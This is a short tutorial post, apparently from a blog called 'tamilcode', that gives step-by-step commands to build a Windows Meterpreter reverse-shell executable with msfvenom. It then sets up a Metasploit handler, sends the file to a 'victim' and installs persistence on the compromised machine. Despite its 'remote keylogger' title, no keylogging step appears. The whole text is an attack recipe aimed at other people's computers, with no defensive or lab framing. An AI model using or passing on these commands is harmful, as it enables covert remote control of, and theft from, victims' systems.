remote keylogger tamilcode

                  WELCOME TO TAMILCODE 

HERE IS TRICKS AND TECHNOLOGY


                           


                              KALI LINUX & TERMUX COMMANDS


IN THIS TUTORIAL  WE SEE ABOUT REMOTE KEYLOGGER


STEP 1  create the payload for windows

msfvenom -p windows/meterpreter/reverse_tcp LHOST= yourip LPORT= portnumber -f exe>filename.exe

NOW PAYLOAD WILL BE CREATE


STEP 2   open metasploit using msfconsole


STEP 3   use exploit/multi/handler


STEP 4  set payload windows/meterpreter/reverse_tcp


STEP 5  set LHOST yourip


STEP 6  set LPORT portnumber


STEP 7  exploit


now send payload to victim


STEP 8  now the sessions will be open


STEP 9  run persistence -U -i 20 -p portnumber -r yourip


i hope that you will understand and please subscribe the tamilcode


YOUR THE VISUAL LEANER PLEASE SEE THE VIDEO


             

Post a Comment

0 Comments